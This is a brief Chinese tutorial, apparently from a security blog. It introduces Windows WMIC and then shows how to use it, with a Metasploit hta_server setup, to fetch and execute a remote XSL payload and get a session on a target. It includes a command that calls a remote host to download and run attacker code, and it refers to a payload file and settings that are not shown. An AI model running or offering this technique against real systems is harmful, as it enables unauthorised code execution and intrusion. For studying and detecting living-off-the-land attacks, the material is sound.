简介
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。
已添加环境变量,路径如下:
C:WindowsSysWOW64wbemWMIC.exe
C:WindowsSystem32wbemWMIC.exe
实际使用
hta_server
msf设定如下,利用xsl代码中链接的hta文件,通过mshta进行下载并执行,但此处文件由wmic进行处罚
xsl文件如下,不仅限于写入hta文件执行,此处我们直接执行命令也是可以的!
再利用wmic来执行xsl文件
wmic os get /FORMAT:"http://192.168.122.1/payload.xsl"
确认上线如下
